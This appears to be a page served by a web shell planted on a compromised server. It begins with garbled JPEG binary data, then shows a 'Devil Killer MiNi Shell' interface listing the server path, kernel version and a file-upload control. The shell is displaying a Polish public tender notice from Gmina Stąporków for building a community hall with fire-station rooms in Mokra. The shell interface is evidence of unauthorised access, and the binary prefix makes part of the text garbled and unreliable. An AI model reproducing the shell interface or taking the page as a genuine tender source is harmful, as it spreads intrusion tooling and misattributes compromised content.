JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221027/0041241601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> BUDOWA ŚWIETLICY WRAZ Z POMIESZCZENIAMI REMIZY W MOKREJ ORAZ ROZBIÓRKA ISTNIEJĄCEGO BUDYNKU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STĄPORKÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 132A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stąporków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@staporkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.staporkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> BUDOWA ŚWIETLICY WRAZ Z POMIESZCZENIAMI REMIZY W MOKREJ ORAZ ROZBIÓRKA ISTNIEJĄCEGO BUDYNKU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-385be5b2-5529-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00412416</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00026690/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Budowa świetlicy wraz z pomieszczeniami remizy w Mokrej oraz rozbiórka istniejącego budynku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">w postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>a) miniPortalu, dostępnego pod adresem: https://miniportal.uzp.gov.pl<br/>b) ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>c) poczty elektronicznej Zamawiającego: przetargi@staporkow.pl<br/>d) elektronicznej skrzynki podawczej Zamawiającego na platformie ePUAP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy, którzy chcą złożyć ofertę w niniejszym postępowaniu o udzielenie zamówienia publicznego muszą posiadać konto na Platformie ePUAP.<br/>- Sposób komunikowania się Zamawiającego z Wykonawcami (Uwaga: nie dotyczy składania oferty):<br/>a) komunikacja w niniejszym postępowaniu o udzielenie zamówienia publicznego obejmująca wymianę informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą z uwzględnieniem wyjątków określonych w ustawie Prawo zamówień publicznych, odbywała się będzie przy użyciu środków komunikacji elektronicznej za pośrednictwem odpowiedniego formularza dostępnego na platformie ePUAP udostępnianego przez miniPortal w zakładce formularz do komunikacji lub za pomocą poczty elektronicznej.<br/>b) Zarówno Wykonawca jak i Zamawiający we wszelkiej korespondencji związanej z niniejszym postępowaniem o udzielenie zamówienia publicznego zobowiązaniu są do posługiwania się numerem ogłoszenia zamieszczonego w Biuletynie Zamówień Publicznych lub ID postępowania.<br/>c) Zamawiający informuje, że w niniejszym postępowaniu będzie komunikował się z Wykonawcami przy użyciu poczty elektronicznej poprzez adres mailowy: przetargi@staporkow.pl<br/>d) Wszelkie dokumenty, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń Wykonawca składa jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Urząd Miejski w Stąporkowie przetwarza dane zawarte w ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego, znajdujące się w publicznie dostępnych rejestrach w celu prowadzenia postępowań w sprawie zamówienia publicznego na postawie przepisów ustawy z dnia 11 września 2019 r. Prawo Zamówień Publicznych (Dz. U. z 2022, poz. 1710). Wśród tych informacji mogą pojawić się dane, które na gruncie Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: &#34;Ogólne Rozporządzenie&#34; lub &#34;RODO&#34;), mają charakter danych osobowych. Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 119 z 04.05.2016) informuję, iż:<br/>1) Administratorem Pani/Pana Danych Osobowych jest: Urząd Miejski w Stąporkowie ul. Marszałka Józefa Piłsudskiego 132A, 26- 220 Stąporków tel. (41) 374 11 22<br/>2) W Urzędzie Miejskim w Stąporkowie został wyznaczony Inspektor Ochrony Danych – Tomasz Paprocki, z którym kontakt jest możliwy pod adresem korespondencyjnym Urząd Miejski w Stąporkowie ul. Marszałka Józefa Piłsudskiego 132A, 26-220 Stąporków, bądź za pomocą adresu e-mail: iodo@staporkow.pl<br/>3) Pana/Pani dane osobowe przetwarzane będą w celu prowadzenia postępowań w sprawie zamówienia publicznego zgodnie z ustawą z dnia 11 września 2019 r. Prawo Zamówień Publicznych na podstawie:<br/>• art. 6 ust. 1 lit. c) RODO przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>• art. 6 ust. 1 lit. f ) RODO jako niezbędne do celów wynikających z prawnie uzasadnionych interesów realizowanych przez<br/>administratora.<br/>4) Odbiorcami Pana/Pani danych osobowych będą: organy uprawnione na podstawie przepisów prawa do otrzymania Pana/Pani danych osobowych. odbiorcami Pana/Pani danych osobowych, osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP oraz właściciela Platformy Zakupowej, na której Administrator prowadzi postępowania o udzielenie zamówienia publicznego<br/>5) Pana/Pani dane osobowe przechowywane będą przez okres niezbędny do realizacji wymienianych powyżej celów zgodnie z art.<br/>78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6) Posiada Pan/Pani prawo do:<br/>• na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pana/Pani danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/Pani, że przetwarzanie danych<br/>osobowych Pana/Pani dotyczących narusza przepisy RODO;<br/>7) Nie przysługuje Panu/Pani prawo do:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pana/Pani danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>8) Pana/Pani dane osobowe nie będą przekazywane do państw pochodzących z poza Europejskiego Obszaru Gospodarczego<br/>(EOG)<br/>9) Podanie danych osobowych Pana/Pani dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy PZP;<br/>10) Jednocześnie Zamawiający przypomina o ciążącym na Panu/Pani obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO. Pana/Pani Dane mogą być przetwarzane w sposób zautomatyzowany (na platformie zakupowej), ale nie będą profilowane</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.11.2022/RS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane realizowane w ramach zadania inwestycyjnego pn. „Budowa świetlicy wraz z pomieszczeniami remizy w Mokrej oraz rozbiórka istniejącego budynku” wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu.<br/>1. Zakres inwestycji obejmuje:<br/>W ramach zadania inwestycyjnego należy wykonać również przebudowę odcinka istniejącej sieci napowietrznej nN i przyłącza napowietrznego do budynku na działce o nr ewid. 1162, oraz wykonanie przyłącza do projektowanego nowego budynku remizy zgodnie z załączonym, odrębnym opracowaniem projektowym.<br/>Realizacja zadania obejmuje m. in. wskazane poniższe czynności:<br/>a) Roboty przygotowawcze,<br/>b) Zewnętrzne roboty elektryczne:<br/>- likwidacja kolizji linii nN – przebudowa sieci napowietrznej niskiego napięcia oraz przyłącza napowietrznego do budynku,<br/>- demontaż istniejącego słupa,<br/>- budowa przyłącza kablowego nN,<br/>- przełożenie istniejącego licznika z istniejącego budynku przeznaczonego do rozbiórki w obrębie dz. nr 1161.<br/>c) Roboty rozbiórkowe – rozbiórka istniejącego budynku remizy,<br/>d) Budowa nowego budynku, w tym:<br/>- pełna obsługa geodezyjna zadania w tym inwentaryzacja powykonawcza,<br/>-roboty ziemne,<br/>- roboty fundamentowe,<br/>- roboty izolacyjne: termiczne, przeciwwilgociowe,<br/>- roboty konstrukcyjne (ściany, strop, dach),<br/>- roboty murowe,<br/>- roboty wykończeniowe,<br/>- montaż stolarki okiennej i drzwiowej,<br/>- wykonanie elewacji budynku w tym ocieplenie,<br/>- roboty instalacyjne wewnętrzne (instalacja elektryczna, instalacja wod–kan, c.o. ze źródłem ciepła c.o i c.w.u pompa ciepła<br/>powietrze -woda),<br/>- wykonanie opaski wokół budynku z kostki betonowej, utwardzenia terenu wraz z miejscami postojowymi,<br/>- wykonanie ogrodzenia prefabrykowanego,<br/>- wykonanie schodów zewnętrznych i podjazdu dla osób z niepełnosprawnościami,<br/>- zainstalowanie paneli fotowoltaicznych,<br/>- wykonanie przyłącza wodociągowego,<br/>- wykonanie przyłącza sanitarnego i bezodpływowego zbiornika na ścieki,<br/>- Dostawa i montaż wyposażenia kuchennego:<br/>2. Do obowiązków Wykonawcy należy:<br/>1) kompleksowe wykonanie zadania zgodnie z projektem budowlano-wykonawczym, STWiORB, decyzją Starosty<br/>Koneckiego NR BP.6740.185.2022.MP, wymogami zawartymi w SWZ, a także wykonania wszystkich innych prac<br/>koniecznych do kompletnej realizacji przedmiotu zamówienia, zgodnie z obowiązującym prawem oraz określonym przez<br/>Zamawiającego przeznaczeniem obiektu,<br/>2) wykonanie przedmiotu umowy przy udziale osób posiadających odpowiednie kwalifikacje oraz za pomocą sprzętu<br/>posiadającego ważne badania techniczne wykonane przez odpowiednie władze dopuszczające go do użytku,<br/>3) powołanie kierownika budowy<br/>- umieszczenia na budowie, w widocznym miejscu tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące<br/>bezpieczeństwa pracy i ochrony zdrowia,<br/>- sporządzenie lub zapewnienie sporządzenia, przed rozpoczęciem budowy, planu bezpieczeństwa i ochrony zdrowia<br/>- odpowiedniego zabezpieczenia terenu budowy,<br/>4) powołanie kierownika robót sanitarnych i elektrycznych<br/>5) zawiadomienie o zamiarze rozpoczęcia robót budowlanych właściwego inspektora pracy przed rozpoczęciem budowy lub<br/>rozbiórki, jeżeli roboty budowlane będą trwały dłużej niż 30 dni roboczych przy jednoczesnym zatrudnieniu co najmniej 20<br/>osób, albo jeżeli planowany zakres robót przekroczy 500 osobodni;<br/>6) powiadomienie Inspektora Nadzoru o terminie wykonania robót zanikających i ulegających zakryciu<br/>7) protokolarne przejęcie terenu robót<br/>8) przed rozpoczęciem robót rozbiórkowych opróżnienie obiektu z ewentualnego mienia w uzgodnieniu z Zamawiającym,<br/>9) zapewnienie dozoru terenu budowy jak również ochronę znajdującego się na nim mienia,<br/>10) zorganizowanie we własnym zakresie i na własny koszt zaplecza budowy<br/>11) wykonanie zabezpieczeń prowadzonych robót zgodnie z wymogami BHP i ppoż:<br/>12) wydzielenie i zabezpieczenie terenu prowadzonych robót<br/>13) przestrzeganie przepisów ochrony przeciwpożarowej<br/>14) zabezpieczanie otaczającej przestrzeni tak, aby nie uległa zniszczeniu lub zabrudzeniu,<br/>15) wykorzystywanie wyłącznie materiałów i urządzeń posiadających odpowiednie dopuszczenie do stosowania i<br/>zapewniających prawidłowe wykonanie i eksploatowanie wykonanego Przedmiotu Umowy,<br/>16) dopilnowanie, aby wyroby budowlane, które będą używane do realizacji Przedmiotu Umowy spełniały wymagania<br/>wynikające z przepisów prawa,<br/>17) bieżące przedkładanie w toku realizacji Przedmiotu Umowy jak również przedłożenie na każde żądanie Zamawiającego<br/>w terminie przez niego wskazanym, atestów, certyfikatów, aprobat i innych dokumentów potwierdzających, że stosowane<br/>wyroby posiadają odpowiednie dopuszczenie do stosowania,<br/>18) w przypadku, gdy powstanie taka konieczność, uzyskanie zgody na dojazd ciężkim sprzętem od zarządcy drogi,<br/>19) zawiadomienie użytkowników istniejącego uzbrojenia terenu o terminie rozpoczęcia prac, oraz zabezpieczenie<br/>istniejącego uzbrojenia terenu,<br/>20) bieżąca obsługa geodezyjna i geotechniczna,<br/>21) uzyskanie wszelkich opinii i zgód niezbędnych do należytego wykonania robót i użytkowania obiektu<br/>22) sporządzenie dokumentacji fotograficznej z placu budowy<br/>23) wykonanie wszelkich robót towarzyszących i tymczasowych niezbędnych do realizacji przedmiotu umowy,<br/>24) zapewnienie wykonania montażu wszelkich urządzeń przez serwis producenta lub serwis autoryzowany przez<br/>producenta,<br/>25) umożliwienie przedstawicielom Zamawiającego wglądu w roboty, a w szczególności wstępu na plac budowy,<br/>26) usunięcie wszelkich Wad i Usterek stwierdzonych przez osobę uprawnioną po stronie Zamawiającego,<br/>27) w przypadku zniszczenia lub uszkodzenia istniejącej infrastruktury w toku realizacji Przedmiotu Umowy – naprawienie jej lub wymianę na nową,<br/>28) zgłaszanie w formie pisemnej Zamawiającemu, a także Inspektorowi Nadzoru Inwestorskiego konieczności wykonania<br/>robót zamiennych koniecznych do prawidłowego funkcjonowania zadania inwestycyjnego,<br/>29) zabezpieczenie środowiska przed negatywnym wpływem prac budowlanych, zapobieganie skażeniu terenu w wyniku<br/>potencjalnych wycieków i awarii wykorzystywanego sprzętu i środków transportu,<br/>30) usunięcie na własny koszt z placu budowy odpadów (np. ziemi nie nadającej się do ponownego wbudowania, gruzu),<br/>przy czym Zamawiający zdecyduje, czy materiały te Wykonawca ma usunąć. Materiały stanowiące wartość dla Zamawiającego podlegają protokolarnemu przekazaniu. Wskazane materiały Wykonawca zobowiązany jest odwieźć w miejsce wskazane przez Zamawiającego na terenie gminy Stąporków,<br/>31) zapewnienie dojazdu właścicielom nieruchomości, czy służbom takim jak policja, pogotowie ratunkowe, straż pożarna,<br/>32) w czasie realizacji zadania, utrzymywanie placu budowy i terenów sąsiadujących w należytym porządku, usunięcie<br/>zbędnych materiałów z placu budowy na składowisko odpadów.<br/>33) usuwanie wszystkich zanieczyszczeń i uszkodzeń powstałych w związku z wykonywaniem robót obejmujących w/w zadanie,<br/>34) przywrócenie placu budowy, terenów sąsiadujących lub innych terenów, w szczególności dróg publicznych zgodnie z<br/>warunkami narzuconymi przez zarządcę drogi i/lub właściciela/władającego terenem, a w przypadku braku takich warunków,<br/>do stanu nie gorszego niż istniejący w dniu ich przejęcia oraz naprawa ewentualnych szkód wyrządzonych na tych terenach,<br/>spowodowanych realizacją robót.<br/>35) dokonanie rozruchu technologicznego urządzeń Wykonawca przeszkoli co najmniej 2 osoby wskazane przez Zamawiającego, miejsce szkolenie – obiekt stanowiący przedmiot zamówienia,<br/>36) wykonanie na własny koszt wszystkich niezbędnych badań, testów i prób umożliwiających należyte wykonanie umowy i<br/>użytkowanie Obiektu/Przedmiotu Umowy, także na wniosek Zamawiającego,<br/>37) opracowanie pełnej inwentaryzacji geodezyjnej powykonawczej realizowanego zadania,<br/>38) przygotowanie kompletnej dokumentacji powykonawczej uzgodnionej z Inspektorem Nadzoru Inwestorskiego,<br/>39) jeżeli w toku realizacji zadania lub w czasie odbiorów wystąpią jakiekolwiek zalecenia pokontrolne organów państwowych, Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do wykonania zaleceń<br/>pokontrolnych,<br/>40) przygotowanie kompletnego wniosku do Powiatowego Inspektora Nadzoru Budowlanego, jak również, Państwowej<br/>Straży Pożarnej oraz Państwowej Inspekcji Sanitarnej, niezbędnego do wydania pozwolenia na użytkowanie,<br/>41) uzyskanie pozwolenia na użytkowanie w imieniu Zamawiającego,<br/>42) wykonanie wszystkich innych prac koniecznych do kompletnego wykonania przedmiotu zamówienia oraz jego<br/>prawidłowego funkcjonowania,<br/>43) przekazanie budynku, po zakończeniu robót budowlanych w stanie umożliwiającym użytkowanie.<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45211300-2 - Roboty budowlane w zakresie budowy domów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 